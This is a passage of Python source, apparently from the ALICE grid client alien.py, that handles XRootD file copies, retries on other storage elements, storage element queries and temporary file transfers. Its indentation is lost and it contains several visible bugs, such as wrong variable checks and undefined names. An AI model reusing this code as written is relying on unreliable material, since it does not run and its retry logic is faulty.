chunksize = int(8388608) # chunk size for remote transfers; use defaults from XrdCl/XrdClConstants.hh
makedir = bool(True) # create the parent directories when creating a file
overwrite = bool(False) # overwrite target if it exists
posc = bool(True) # persist on successful close; Files are automatically deleted should they not be successfully closed.
cksum = bool(False)
timeout = int(0)
rate = int(0)
# xrdcp parameters (used by ALICE tests)
# http://xrootd.org/doc/man/xrdcp.1.html
# xrootd defaults https://github.com/xrootd/xrootd/blob/master/src/XrdCl/XrdClConstants.hh
# TODO these will not work for xrdcp subprocess; the env vars should also be set
# Resolution for the timeout events. Ie. timeout events will be processed only every XRD_TIMEOUTRESOLUTION seconds.
if not os.getenv('XRD_TIMEOUTRESOLUTION'): XRD_EnvPut('TimeoutResolution', int(1)) # let's check the status every 1s
# Number of connection attempts that should be made (number of available connection windows) before declaring a permanent failure.
if not os.getenv('XRD_CONNECTIONRETRY'): XRD_EnvPut('ConnectionRetry', int(3))
# A time window for the connection establishment. A connection failure is declared if the connection is not established within the time window.
# N.B.!!. If a connection failure happens earlier then another connection attempt will only be made at the beginning of the next window
if not os.getenv('XRD_CONNECTIONWINDOW'): XRD_EnvPut('ConnectionWindow', int(10))
# Default value for the time after which an error is declared if it was impossible to get a response to a request.
if not os.getenv('XRD_REQUESTTIMEOUT'): XRD_EnvPut('RequestTimeout', int(30))
# Maximum time allowed for the copy process to initialize, ie. open the source and destination files.
if not os.getenv('XRD_CPINITTIMEOUT'): XRD_EnvPut('CPInitTimeout', int(30))
# Time period after which an idle connection to a data server should be closed.
if not os.getenv('XRD_DATASERVERTTL'): XRD_EnvPut('DataServerTTL', int(20)) # we have no reasons to keep idle connections
# Time period after which an idle connection to a manager or a load balancer should be closed.
if not os.getenv('XRD_LOADBALANCERTTL'): XRD_EnvPut('LoadBalancerTTL', int(30)) # we have no reasons to keep idle connections
# If set the client tries first IPv4 address (turned off by default).
if not os.getenv('XRD_PREFERIPV4'): XRD_EnvPut('PreferIPv4', int(1))
if get_arg(xrd_copy_command, '-noxrdzip'): os.environ["ALIENPY_NOXRDZIP"] = "nozip"
_use_system_xrdcp = get_arg(xrd_copy_command, '-xrdcp')
overwrite = get_arg(xrd_copy_command, '-f')
posc = get_arg(xrd_copy_command, '-P')
cksum = get_arg(xrd_copy_command, '-cksum')
tpc = 'none'
if get_arg(xrd_copy_command, '-tpc'): tpc = 'first'
if tpc != 'none': return RET(1, "", 'DO_XrootdCp:: TPC is not allowed!!')
y_arg_val = get_arg_value(xrd_copy_command, '-y')
# sources = int(y_arg_val)
if y_arg_val: print_out("Ignored option! multiple source usage is known to break the files stored in zip files, so better to be ignored")
streams_arg = get_arg_value(xrd_copy_command, '-S')
if streams_arg:
streams = int(streams)
if (streams > 15): streams = 15
batch = 8 # a nice enough default
batch_arg = get_arg_value(xrd_copy_command, '-T')
if batch_arg: batch = int(batch_arg)
chunks_arg = get_arg_value(xrd_copy_command, '-chunks')
if chunks_arg: chunks = int(chunks_arg)
chunksz_arg = get_arg_value(xrd_copy_command, '-chunksz')
if chunksz_arg: chunksize = int(chunksz_arg)
timeout_arg = get_arg_value(xrd_copy_command, '-timeout')
if timeout_arg:
timeout = int(timeout_arg)
XRD_EnvPut('CPTimeout', timeout)
rate_arg = get_arg_value(xrd_copy_command, '-ratethreshold')
if rate_arg:
rate = int(rate_arg)
XRD_EnvPut('XRateThreshold', rate)
XRD_EnvPut('CpRetryPolicy', 'force')
retry_arg = get_arg_value(xrd_copy_command, '-retry')
if rate_arg:
retry = int(retry_arg)
XRD_EnvPut('CpRetry', retry)
# options for envelope request
strictspec = get_arg(xrd_copy_command, '-strictspec')
httpurl = get_arg(xrd_copy_command, '-http')
# keep this many path components into destination filepath
parent = int(0)
parent_arg = get_arg_value(xrd_copy_command, '-parent')
if parent_arg: parent = int(parent_arg)
# find options for recursive copy of directories
find_args = []
if get_arg(xrd_copy_command, '-v'): print_out("Verbose mode not implemented, ignored; enable debugging with ALIENPY_DEBUG=1")
if get_arg(xrd_copy_command, '-a'): print_out("-a is enabled as default")
if get_arg(xrd_copy_command, '-s'): print_out("-s is enabled as default")
if get_arg(xrd_copy_command, '-f'): print_out("-f API flag not usefull for copy operations")
if get_arg(xrd_copy_command, '-w'): print_out("-w flag not usefull for copy operations")
if get_arg(xrd_copy_command, '-wh'): print_out("-wh flag not usefull for copy operations")
if get_arg(xrd_copy_command, '-d'): print_out("-d flag not usefull for copy operations")
mindepth_arg = get_arg_value(xrd_copy_command, '-mindepth')
if mindepth_arg: find_args.extend(['-mindepth', mindepth_arg])
maxdepth_arg = get_arg_value(xrd_copy_command, '-maxdepth')
if maxdepth_arg: find_args.extend(['-maxdepth', maxdepth_arg])
qid = get_arg_value(xrd_copy_command, '-j')
if qid: find_args.extend(['-j', qid])
files_limit = get_arg_value(xrd_copy_command, '-l')
if files_limit: find_args.extend(['-l', files_limit])
offset = get_arg_value(xrd_copy_command, '-o')
if offset: find_args.extend(['-o', offset])
use_regex = False
filtering_enabled = False
pattern = get_arg_value(xrd_copy_command, '-glob')
if pattern:
use_regex = False
filtering_enabled = True
pattern_regex = None
select_arg = get_arg_value(xrd_copy_command, '-select')
if select_arg:
if filtering_enabled:
msg = "Only one rule of selection can be used, either -select (full path match), -name (match on file name) or -glob (globbing)"
return RET(22, '', msg) # EINVAL /* Invalid argument */
pattern_regex = select_arg
use_regex = True
filtering_enabled = True
name_arg = get_arg_value(xrd_copy_command, '-name')
if name_arg:
if filtering_enabled:
msg = "Only one rule of selection can be used, either -select (full path match), -name (match on file name) or -glob (globbing)"
return RET(22, '', msg) # EINVAL /* Invalid argument */
use_regex = True
filtering_enabled = True
pattern_regex = name2regex(name_arg)
if use_regex and not pattern_regex:
msg = ("-name :: No selection verbs were recognized!"
"usage format is -name <attribute>_<string> where attribute is one of: begin, contain, ends, ext"
f"The invalid pattern was: {pattern_regex_arg}")
return RET(22, '', msg) # EINVAL /* Invalid argument */
if use_regex: pattern = pattern_regex
copy_lfnlist = [] # list of lfn copy tasks
input_file = '' # input file with <source, destination> pairs
inputfile_arg = get_arg_value(xrd_copy_command, '-input')
if inputfile_arg:
cp_arg_list = fileline2list(inputfile_arg)
if not cp_arg_list: return RET(1, '', f'Input file {inputfile_arg} not found or invalid content')
for cp_line in cp_arg_list:
cp_line_items = cp_line.strip().split()
if len(cp_line_items) > 2:
print_out(f'Line skipped, it has more than 2 arguments => f{line.strip()}')
continue
retobj = makelist_lfn(wb, cp_line_items[0], cp_line_items[1], find_args, parent, overwrite, pattern, use_regex, copy_lfnlist, strictspec, httpurl)
retf_print(retobj, "noout err") # print error and continue with the other files
else:
retobj = makelist_lfn(wb, xrd_copy_command[-2], xrd_copy_command[-1], find_args, parent, overwrite, pattern, use_regex, copy_lfnlist, strictspec, httpurl)
if retobj.exitcode != 0: return retobj # if any error let's just return what we got
if not copy_lfnlist: # at this point if any errors, the processing was already stopped
return RET(0)
if _DEBUG:
logging.debug("We are going to copy these files:")
for file in copy_lfnlist: logging.debug(file)
# create a list of copy jobs to be passed to XRootD mechanism
xrdcopy_job_list = []
makelist_xrdjobs(copy_lfnlist, xrdcopy_job_list)
if not xrdcopy_job_list:
msg = "No XRootD operations in list! enable the DEBUG mode for more info"
logging.info(msg)
return RET(2, '', msg) # ENOENT /* No such file or directory */
if _DEBUG:
logging.debug("XRootD copy jobs:")
for file in xrdcopy_job_list: logging.debug(file)
msg1 = msg2 = msg3 = msg_sum = ''
copy_jobs_nr = copy_jobs_nr1 = copy_jobs_nr2 = 0
copy_jobs_failed_nr = copy_jobs_failed_nr1 = copy_jobs_failed_nr2 = 0
copy_jobs_success_nr = copy_jobs_success_nr1 = copy_jobs_success_nr2 = 0
my_cp_args = XrdCpArgs(overwrite, batch, sources, chunks, chunksize, makedir, tpc, posc, hashtype, streams, cksum, timeout, rate)
# defer the list of url and files to xrootd processing - actual XRootD copy takes place
copy_failed_list = XrdCopy(wb, xrdcopy_job_list, my_cp_args, printout) if not _use_system_xrdcp else XrdCopy_xrdcp(wb, xrdcopy_job_list, my_cp_args, printout)
copy_jobs_nr = len(xrdcopy_job_list)
copy_jobs_failed_nr = len(copy_failed_list)
copy_jobs_success_nr = copy_jobs_nr - copy_jobs_failed_nr
msg1 = f"Succesful jobs (1st try): {copy_jobs_success_nr}/{copy_jobs_nr}" if not ('quiet' in printout or 'silent' in printout) else ''
copy_failed_list2 = []
if copy_failed_list:
to_recover_list_try1 = []
failed_lfns = set([copy_job.lfn for copy_job in copy_failed_list if copy_job.isUpload]) # get which lfns had problems only for uploads
for lfn in failed_lfns: # process failed transfers per lfn
failed_lfn_copy_jobs = [x for x in copy_failed_list if x.lfn == lfn] # gather all failed copy jobs for one lfn
failed_replica_nr = len(failed_lfn_copy_jobs)
excluded_SEs_list = []
for job in failed_lfn_copy_jobs:
for se in job.token_request["SElist"]:
excluded_SEs_list.append(f'!{se}')
excluded_SEs = ','.join(set(excluded_SEs_list)) # exclude already used SEs
specs_list = f'disk:{failed_replica_nr},{excluded_SEs}' # request N replicas (in place of failed ones), and exclude anything used
job_file = failed_lfn_copy_jobs[0].token_request['file']
job_lfn = failed_lfn_copy_jobs[0].token_request['lfn']
job_isWrite = failed_lfn_copy_jobs[0].isUpload
tokens_retry1 = lfn2fileTokens(wb, lfn2file(job_lfn, job_file), specs_list, job_isWrite, strictspec, httpurl)
if not tokens_retry1 or 'answer' not in tokens_retry1: continue
to_recover_list_try1.append(CopyFile(job_file, job_lfn, job_isWrite, tokens_retry1['answer'], job_lfn))
if to_recover_list_try1:
xrdcopy_job_list_2 = []
makelist_xrdjobs(to_recover_list_try1, xrdcopy_job_list_2)
copy_failed_list2 = XrdCopy(wb, xrdcopy_job_list_2, my_cp_args, printout)
copy_jobs_nr1 = len(xrdcopy_job_list_2)
copy_jobs_failed_nr1 = len(copy_failed_list2)
copy_jobs_success_nr1 = copy_jobs_nr1 - copy_jobs_failed_nr1
msg2 = f"Succesful jobs (2nd try): {copy_jobs_success_nr1}/{copy_jobs_nr1}" if not ('quiet' in printout or 'silent' in printout) else ''
copy_failed_list3 = []
if copy_failed_list2:
to_recover_list_try2 = []
failed_lfns2 = set([copy_job.lfn for copy_job in copy_failed_list2 if copy_job.isUpload]) # get which lfns had problems only for uploads
for lfn in failed_lfns2: # process failed transfers per lfn
failed_lfn_copy_jobs2 = [x for x in copy_failed_list2 if x.lfn == lfn] # gather all failed copy jobs for one lfn
failed_replica_nr = len(failed_lfn_copy_jobs2)
excluded_SEs_list = []
for job in failed_lfn_copy_jobs2:
for se in job.token_request["SElist"]:
excluded_SEs_list.append(f'!{se}')
excluded_SEs = ','.join(set(excluded_SEs_list)) # exclude already used SEs
specs_list = f'disk:{failed_replica_nr},{excluded_SEs}' # request N replicas (in place of failed ones), and exclude anything used
job_file = failed_lfn_copy_jobs2[0].token_request['file']
job_lfn = failed_lfn_copy_jobs2[0].token_request['lfn']
job_isWrite = failed_lfn_copy_jobs2[0].isUpload
tokens_retry2 = lfn2fileTokens(wb, lfn2file(job_lfn, job_file), specs_list, job_isWrite, strictspec, httpurl)
if not tokens_retry2 or 'answer' not in tokens_retry1: continue
to_recover_list_try2.append(CopyFile(job_file, job_lfn, job_isWrite, tokens_retry2['answer'], job_lfn))
if to_recover_list_try2:
xrdcopy_job_list_3 = []
makelist_xrdjobs(to_recover_list_try2, xrdcopy_job_list_3)
copy_failed_list3 = XrdCopy(wb, xrdcopy_job_list_3, my_cp_args, printout)
copy_jobs_nr2 = len(xrdcopy_job_list_3)
copy_jobs_failed_nr2 = len(copy_failed_list3)
copy_jobs_success_nr2 = copy_jobs_nr2 - copy_jobs_failed_nr2
msg3 = f"Succesful jobs (3rd try): {copy_jobs_success_nr2}/{copy_jobs_nr2}" if not ('quiet' in printout or 'silent' in printout) else ''
copy_jobs_failed_total = copy_jobs_failed_nr + copy_jobs_failed_nr1 + copy_jobs_failed_nr2
copy_jobs_nr_total = copy_jobs_nr + copy_jobs_nr1 + copy_jobs_nr2
copy_jobs_success_nr_total = copy_jobs_success_nr + copy_jobs_success_nr1 + copy_jobs_success_nr2
# hard to return a single exitcode for a copy process optionally spanning multiple files
# we'll return SUCCESS if at least one lfn is confirmed, FAIL if not lfns is confirmed
msg_list = [msg1, msg2, msg3]
if msg2 or msg3:
msg_sum = f"Succesful jobs (total): {copy_jobs_success_nr_total}/{copy_jobs_nr}" if not ('quiet' in printout or 'silent' in printout) else ''
msg_list.append(msg_sum)
msg_all = '\n'.join(x.strip() for x in msg_list if x.strip())
if 'ALIENPY_NOXRDZIP' in os.environ: os.environ.pop("ALIENPY_NOXRDZIP")
return RET(0, msg_all) if copy_jobs_success_nr_total > 0 else RET(1, '', msg_all)
if _HAS_XROOTD:
class MyCopyProgressHandler(xrd_client.utils.CopyProgressHandler):
"""Custom ProgressHandler for XRootD copy process"""
__slots__ = ('wb', 'copy_failed_list', 'jobs', 'job_list', 'xrdjob_list', 'succesful_writes', 'printout', 'debug')
def __init__(self):
self.wb = None
self.copy_failed_list = [] # record the failed jobs
self.jobs = int(0)
self.job_list = []
self.xrdjob_list = []
self.succesful_writes = []
self.printout = ''
self.debug = False
def begin(self, jobId, total, source, target):
timestamp_begin = datetime.datetime.now().timestamp()
if not ('quiet' in self.printout or 'silent' in self.printout):
print_out("jobID: {0}/{1} >>> Start".format(jobId, total))
self.jobs = int(total)
jobInfo = {'src': source, 'tgt': target, 'bytes_total': 0, 'bytes_processed': 0, 'start': timestamp_begin}
self.job_list.insert(jobId - 1, jobInfo)
if self.debug: logging.debug(f"CopyProgressHandler.src: {source}\nCopyProgressHandler.dst: {target}\n")
def end(self, jobId, results):
if results['status'].ok:
status = f'{PrintColor(COLORS.Green)}OK{PrintColor(COLORS.ColorReset)}'
elif results['status'].error:
status = f'{PrintColor(COLORS.BRed)}ERROR{PrintColor(COLORS.ColorReset)}'
elif results['status'].fatal:
status = f'{PrintColor(COLORS.BIRed)}FATAL{PrintColor(COLORS.ColorReset)}'
else:
status = f'{PrintColor(COLORS.BIRed)}UNKNOWN{PrintColor(COLORS.ColorReset)}'
job_info = self.job_list[jobId - 1]
xrdjob = self.xrdjob_list[jobId - 1] # joblist initilized when starting; we use the internal index to locate the job
replica_dict = xrdjob.token_request
job_status_info = f"jobID: {jobId}/{self.jobs} >>> STATUS {status}"
deltaT = datetime.datetime.now().timestamp() - float(job_info['start'])
if os.getenv('XRD_LOGLEVEL'): logging.debug(f'XRD copy job time:: {xrdjob.lfn} -> {deltaT}')
if results['status'].ok:
speed = float(job_info['bytes_total'])/deltaT
speed_str = f'{GetHumanReadable(speed)}/s'
if xrdjob.isUpload: # isUpload
perm = '644'
expire = '0'
self.succesful_writes.append(CommitInfo(replica_dict['envelope'], replica_dict['size'], xrdjob.lfn, perm, expire, replica_dict['url'], replica_dict['se'], replica_dict['guid'], replica_dict['md5']))
else: # isDownload
if 'ALIENPY_NOXRDZIP' in os.environ: # NOXRDZIP was requested
if os.path.isfile(xrdjob.dst) and zipfile.is_zipfile(xrdjob.dst):
src_file_name = os.path.basename(xrdjob.lfn)
dst_file_name = os.path.basename(xrdjob.dst)
dst_file_path = os.path.dirname(xrdjob.dst)
zip_name = f'{xrdjob.dst}_{uuid.uuid4()}.zip'
os.replace(xrdjob.dst, zip_name)
with zipfile.ZipFile(zip_name) as myzip:
if src_file_name in myzip.namelist():
out_path = myzip.extract(src_file_name, path = dst_file_path)
if out_path and (src_file_name != dst_file_name): os.replace(src_file_name, dst_file_name)
else: # the downloaded file is actually a zip file
os.replace(zip_name, xrdjob.dst)
if os.path.isfile(zip_name): os.remove(zip_name)
if not ('quiet' in self.printout or 'silent' in self.printout):
print_out(f"{job_status_info} >>> SPEED {speed_str}")
else:
self.copy_failed_list.append(xrdjob)
if xrdjob.isUpload:
msg = f"{job_status_info} : {xrdjob.token_request['file']} to {xrdjob.token_request['se']}, {xrdjob.token_request['nSEs']} replicas"
else:
msg = f"{job_status_info} : {xrdjob.lfn}"
codes_info = f">>> ERRNO/CODE/XRDSTAT {results['status'].errno}/{results['status'].code}/{results['status'].status}"
xrd_resp_msg = results['status'].message
logging.error(f"\n{codes_info}\n{xrd_resp_msg}\n{msg}")
print_err(msg)
if not xrdjob.isUpload:
meta_path, sep, url_opts = str(xrdjob.src).partition("?")
if os.getenv('ALIENPY_KEEP_META'):
subprocess.run(shlex.split(f'mv {meta_path} {os.getcwd()}/'))
else:
os.remove(meta_path) # remove the created metalink
def update(self, jobId, processed, total):
self.job_list[jobId - 1]['bytes_processed'] = processed
self.job_list[jobId - 1]['bytes_total'] = total
def should_cancel(self, jobId):
return False
def XrdCopy(wb, job_list: list, xrd_cp_args: XrdCpArgs, printout: str = '') -> list:
"""XRootD copy command :: the actual XRootD copy process"""
if not _HAS_XROOTD:
print_err("XRootD not found or lower than 5.3.3")
return []
if not xrd_cp_args:
print_err("cp arguments are not set, XrdCpArgs tuple missing")
return []
overwrite = xrd_cp_args.overwrite
batch = xrd_cp_args.batch
sources = xrd_cp_args.sources
chunks = xrd_cp_args.chunks
chunksize = xrd_cp_args.chunksize
makedir = xrd_cp_args.makedir
tpc = xrd_cp_args.tpc
posc = xrd_cp_args.posc
# hashtype = xrd_cp_args.hashtype
streams = xrd_cp_args.streams
cksum = xrd_cp_args.cksum
timeout = xrd_cp_args.timeout
rate = xrd_cp_args.rate
if streams > 0:
if streams > 15: streams = 15
xrd_client.EnvPutInt('SubStreamsPerChannel', streams)
cksum_mode = 'none' # none | source | target | end2end
cksum_type = ''
cksum_preset = ''
delete_invalid_chk = False
if cksum: # checksumming defaults good enough also for uploads
xrd_client.EnvPutInt('ZipMtlnCksum', 1)
cksum_mode = 'end2end'
cksum_type = 'auto'
delete_invalid_chk = True
handler = MyCopyProgressHandler()
handler.wb = wb
handler.xrdjob_list = job_list
handler.printout = printout
handler.succesful_writes = []
if _DEBUG: handler.debug = True
process = xrd_client.CopyProcess()
process.parallel(int(batch))
for copy_job in job_list:
if _DEBUG: logging.debug("\nadd copy job with\nsrc: {0}\ndst: {1}\n".format(copy_job.src, copy_job.dst))
if cksum:
if copy_job.isUpload:
# WIP: checksumming with md5 for uploading breaks, keep it on auto
# cksum_type = 'md5'
# cksum_preset = copy_job.token_request['md5']
pass
else: # for downloads we already have the md5 value, lets use that
cksum_type, cksum_preset = get_hash_meta(copy_job.src)
if not cksum_type or not cksum_preset:
cksum_type = ''
cksum_preset = ''
cksum_mode = 'none'
process.add_job(copy_job.src, copy_job.dst, sourcelimit = sources,
force = overwrite, posc = posc, mkdir = makedir,
chunksize = chunksize, parallelchunks = chunks, thirdparty = tpc,
checksummode = cksum_mode, checksumtype = cksum_type, checksumpreset = cksum_preset, rmBadCksum = delete_invalid_chk)
process.prepare()
process.run(handler)
if handler.succesful_writes: # if there were succesful uploads/remote writes, let's commit them to file catalogue
ret_list = commitFileList(wb, handler.succesful_writes)
for ret in ret_list: retf_print(ret, 'noout err')
return handler.copy_failed_list # lets see what failed and try to recover
def xrd_stat(pfn: str):
if not _HAS_XROOTD:
print_err('python XRootD module not found')
return None
url_components = urlparse(pfn)
endpoint = xrd_client.FileSystem(url_components.netloc)
answer = endpoint.stat(url_components.path)
return answer
def get_pfn_flags(pfn: str):
answer = xrd_stat(pfn)
if not answer[0].ok: return None
return answer[1].flags
def is_pfn_readable(pfn: str) -> bool:
flags = get_pfn_flags(pfn)
if flags is None: return False
return bool(flags & xrd_client.flags.StatInfoFlags.IS_READABLE)
def DO_pfnstatus(args: Union[list, None] = None) -> RET:
global AlienSessionInfo
if args is None: args = []
if not args or is_help(args):
msg = ('Command format: pfn_status <pfn>\n'
'It will return all flags reported by the xrootd server - this is direct access to server')
return RET(0, msg)
pfn = args.pop(0)
answer = xrd_stat(pfn)
response_stat = answer[0]
response_statinfo = answer[1]
if not response_stat.ok:
msg = (f'{response_stat.message}; code/status: {response_stat.code}/{response_stat.status}')
return RET(response_stat.shellcode, '', msg)
size = response_statinfo.size
modtime = response_statinfo.modtimestr
flags = response_statinfo.flags
x_bit_set = 1 if flags & xrd_client.flags.StatInfoFlags.X_BIT_SET else 0
is_dir = 1 if flags & xrd_client.flags.StatInfoFlags.IS_DIR else 0
other = 1 if flags & xrd_client.flags.StatInfoFlags.OTHER else 0
offline = 1 if flags & xrd_client.flags.StatInfoFlags.OFFLINE else 0
posc_pending = 1 if flags & xrd_client.flags.StatInfoFlags.POSC_PENDING else 0
is_readable = 1 if flags & xrd_client.flags.StatInfoFlags.IS_READABLE else 0
is_writable = 1 if flags & xrd_client.flags.StatInfoFlags.IS_WRITABLE else 0
msg = (f'''Size: {size}\n'''
f'''Modification time: {modtime}\n'''
f'''Executable bit: {x_bit_set}\n'''
f'''Is directory: {is_dir}\n'''
f'''Not a file or directory: {other}\n'''
f'''File is offline (not on disk): {offline}\n'''
f'''File opened with POSC flag, not yet successfully closed: {posc_pending}\n'''
f'''Is readable: {is_readable}\n'''
f'''Is writable: {is_writable}''')
return RET(response_stat.shellcode, msg)
def get_pfn_list(wb, lfn: str) -> list:
if not wb: return []
if not lfn: return []
if pathtype_grid(wb, lfn) != 'f': return []
ret_obj = SendMsg(wb, 'whereis', [lfn], opts = 'nomsg')
retf_print(ret_obj, 'debug')
return [str(item['pfn']) for item in ret_obj.ansdict['results']]
def DO_getSE(wb, args: list = None) -> RET:
if not wb: return []
if not args: args = []
if is_help(args):
msg = 'Command format: getSE <-id | -name | -srv> identifier_string\nReturn the specified property for the SE specified label'
return RET(0, msg)
ret_obj = SendMsg(wb, 'listSEs', [], 'nomsg')
if ret_obj.exitcode != 0: return ret_obj
arg_select = None
if get_arg(args, '-id'): arg_select = 'id'
if get_arg(args, '-name'): arg_select = 'name'
if get_arg(args, '-srv'): arg_select = 'srv'
if arg_select is None: arg_select = 'name'
if not args:
se_list = [f"{se['seNumber']}\t{se['seName']}\t{se['endpointUrl'].replace('root://','')}" for se in ret_obj.ansdict["results"]]
return RET(0, '\n'.join(se_list))
def match_name(se: Union[dict, None] = None, name: str = '') -> bool:
if se is None or not name: return False
if name.isdecimal(): return name in se['seNumber']
return name.casefold() in se['seName'].casefold() or name.casefold() in se['seNumber'].casefold() or name.casefold() in se['endpointUrl'].casefold()
se_name = args[-1].casefold()
se_list = []
rez_list = []
for se in ret_obj.ansdict["results"]:
if match_name(se, se_name): se_list.append(se)
if not se_list: return RET(1, '', f">{args[-1]}< label(s) not found in SE list")
for se_info in se_list:
srv_name = urlparse(se_info["endpointUrl"]).netloc.strip()
if se_name.isdecimal():
if arg_select == 'name':
rez_list.append(se_info['seName'])
elif arg_select == 'srv':
rez_list.append(srv_name)
else:
rez_list.append(f"{se_info['seName']} {srv_name}")
else:
if arg_select == 'name':
rez_list.append(se_info['seName'])
elif arg_select == 'srv':
rez_list.append(srv_name)
elif arg_select == 'id':
rez_list.append(se_info['seNumber'])
else:
rez_list.append(f"{se_info['seNumber']}\t{se_info['seName']}\t\t{srv_name}")
if not rez_list: return RET(1, '', f"Empty result when searching for: {args[-1]}")
return RET(0, '\n'.join(rez_list))
def get_qos(wb, se_str: str) -> str:
"""Get qos tags for a given SE"""
if not wb: return ''
if '::' not in se_str: return '' # the se name should have :: in it
ret_obj = SendMsg(wb, 'listSEs', [], 'nomsg')
for se in ret_obj.ansdict["results"]:
if se["seName"].lower().replace('alice::', '') == se_str.lower().replace('alice::', ''):
return se["qos"]
return ''
def DO_SEqos(wb, args: list = None) -> RET:
if not wb: return []
if not args or is_help(args):
msg = 'Command format: SEqos <SE name>\nReturn the QOS tags for the specified SE (ALICE:: can be ommited and capitalization does not matter)'
return RET(0, msg)
return RET(0, get_qos(wb, args[0]))
def get_lfn_meta(meta_fn: str) -> str:
if not os.path.isfile(meta_fn): return ''
return xml.dom.minidom.parse(meta_fn).documentElement.getElementsByTagName('lfn')[0].firstChild.nodeValue
def get_hash_meta(meta_fn: str) -> tuple:
if 'meta4?' in meta_fn: meta_fn = meta_fn.partition('?')[0]
if not os.path.isfile(meta_fn): return ('','')
content = xml.dom.minidom.parse(meta_fn).documentElement.getElementsByTagName('hash')[0]
return (content.getAttribute('type'), content.firstChild.nodeValue)
def lfn2tmp_fn(lfn: str = '', uuid5: bool = False) -> str:
"""make temporary file name that can be reconstructed back to the lfn"""
if not lfn: return str(uuid.uuid4())
if uuid5:
return str(uuid.uuid5(uuid.NAMESPACE_URL, lfn))
return lfn.replace("/", '%%')
def make_tmp_fn(lfn: str = '', ext: str = '', uuid5: bool = False) -> str:
"""make temporary file path string either random or based on grid lfn string"""
if not ext: ext = f'_{str(os.getuid())}.alienpy_tmp'
return f'{_TMPDIR}/{lfn2tmp_fn(lfn, uuid5)}{ext}'
def get_lfn_name(tmp_name: str = '', ext: str = '') -> str:
lfn = tmp_name.replace(ext, '') if ext else tmp_name.replace(f'_{str(os.getuid())}.alienpy_tmp', '')
return lfn.replace(f'{_TMPDIR}/', '').replace("%%", "/")
def download_tmp(wb, lfn: str, overwrite: bool = False) -> str:
"""Download a lfn to a temporary file, it will return the file path of temporary"""
global AlienSessionInfo
tmpfile = make_tmp_fn(expand_path_grid(wb, lfn))
if os.path.isfile(tmpfile):
if overwrite:
os.remove(tmpfile)
if tmpfile in AlienSessionInfo['templist']: AlienSessionInfo['templist'].remove(tmpfile)
else:
if tmpfile not in AlienSessionInfo['templist']: AlienSessionInfo['templist'].append(tmpfile)
return tmpfile
if tmpfile in AlienSessionInfo['templist']: AlienSessionInfo['templist'].remove(tmpfile) # just in case it is still in list
copycmd = f"-f {lfn} file:{tmpfile}"
ret_obj = DO_XrootdCp(wb, copycmd.split(), printout = 'silent') # print only errors for temporary downloads
if ret_obj.exitcode == 0 and os.path.isfile(tmpfile):
AlienSessionInfo['templist'].append(tmpfile)
return tmpfile
return ''
def upload_tmp(wb, temp_file_name: str, upload_specs: str = '', dated_backup: bool = False) -> str:
"""Upload a temporary file: the original lfn will be renamed and the new file will be uploaded with the original lfn"""
lfn = get_lfn_name(temp_file_name) # lets recover the lfn from temp file name
lfn_backup = f'{lfn}.{now_str()}' if dated_backup else f'{lfn}~'
if not dated_backup:
ret_obj = SendMsg(wb, 'rm', ['-f', lfn_backup]) # remove already present old backup; useless to pre-check
ret_obj = SendMsg(wb, 'mv', [lfn, lfn_backup]) # let's create a backup of old lfn
if retf_print(ret_obj, 'debug') != 0: return ''
tokens = lfn2fileTokens(wb, lfn2file(lfn, temp_file_name), [upload_specs], isWrite = True)
access_request = tokens['answer']
replicas = access_request["results"][0]["nSEs"]
if "disk:" not in upload_specs: upload_specs = f'disk:{replicas}'
if upload_specs: upload_specs = f'@{upload_specs}'
copycmd = f'-f file:{temp_file_name} {lfn}{upload_specs}'
ret_obj = DO_XrootdCp(wb, copycmd.split())
if ret_obj.exitcode == 0: return lfn
ret_obj = SendMsg(wb, 'mv', [lfn_backup, lfn]) # if the upload failed let's move back the backup to original lfn name'
retf_print(ret_obj, 'debug')
return ''
def queryML(args: list = None) -> str:
"""submit: process submit commands for local jdl cases"""
global AlienSessionInfo
alimon = 'http://alimonitor.cern.ch/rest/'
type_json = '?Accept=application/json'
type_xml = '?Accept=text/xml'
type_plain = '?Accept=text/plain'
type_default = ''
predicate = ''
if 'text' in args:
type_default = type_plain
args.remove('text')
if 'xml' in args:
type_default = type_xml
args.remove('xml')
if 'json' in args:
type_default = type_json
args.remove('json')
if args: predicate = args[0]
url = f"{alimon}{predicate}{type_default}"
req = urlreq.urlopen(url)
ansraw = req.read().decode()
if req.getcode() == 200:
AlienSessionInfo['exitcode'] = 0
else:
AlienSessionInfo['exitcode'] = req.getcode()
return ansraw
def file2xml_el(filepath: str) -> ALIEN_COLLECTION_EL:
"""Get a file and return an XML element structure"""
if not filepath or not os.path.isfile(filepath): return ALIEN_COLLECTION_EL()
p = Path(filepath).expanduser().resolve(strict = True)
p_stat = p.stat()
turl = f'file://{p.as_posix()}'
return ALIEN_COLLECTION_EL(
name = p.name, aclId = "", broken = "0", ctime = time_unix2simple(p_stat.st_ctime),
dir = '', entryId = '', expiretime = '', gowner = p.group(), guid = '', guidtime = '', jobid = '', lfn = turl,
md5 = md5(p.as_posix()), owner = p.owner(), perm = str(oct(p_stat.st_mode))[5:], replicated = "0",
size = str(p_stat.st_size), turl = turl, type = 'f')
def mk_xml_local(filepath_list: list):
xml_root = ET.Element('alien')
collection = ET.SubElement(xml_root, 'collection', attrib={'name': 'tempCollection'})
for idx, item in enumerate(filepath_list, start = 1):
e = ET.SubElement(collection, 'event', attrib={'name': str(idx)})
f = ET.SubElement(e, 'file', attrib=file2xml_el(lfn_prefix_re.sub('', item))._asdict())
oxml = ET.tostring(xml_root, encoding = 'ascii')
dom = xml.dom.minidom.parseString(oxml)
return dom.toprettyxml()
def DO_2xml(wb, args: Union[list, None] = None) -> RET:
if args is None: args = []
if not args or is_help(args):
central_help = SendMsg(wb, 'toXml', ['-h'], opts = 'nokeys')
central_help_msg = central_help.out
msg_local = (f'\nAdditionally the client implements these options:'
'\n-local: specify that the target lfns are local files'
'\nfor -x (output file) and -l (file with lfns) the file: and alien: represent the location of file'
'\nthe inferred defaults are that the target files and the output files are of the same type'
)
msg = f'{central_help_msg}{msg_local}'
return RET(0, msg)
is_local = get_arg(args, '-local')
ignore_missing = get_arg(args, '-i')
do_append = get_arg(args, '-a')
output_file = get_arg_value(args, '-x')
if do_append and output_file is None: return RET(1, '', 'Append operation need -x argument for specification of target file')
lfn_filelist = get_arg_value(args, '-l')
lfn_list = []
find_arg_list = None
lfn_arg_list = None
if lfn_filelist: # a given file with list of files/lfns was provided
if is_local:
if not os.path.exists(lfn_filelist): return RET(1, '', 'filelist {lfn_filelist} could not be found!!')
filelist_content_list = file2list(lfn_filelist)
if not filelist_content_list: return RET(1, '', f'No files could be read from {lfn_filelist}')
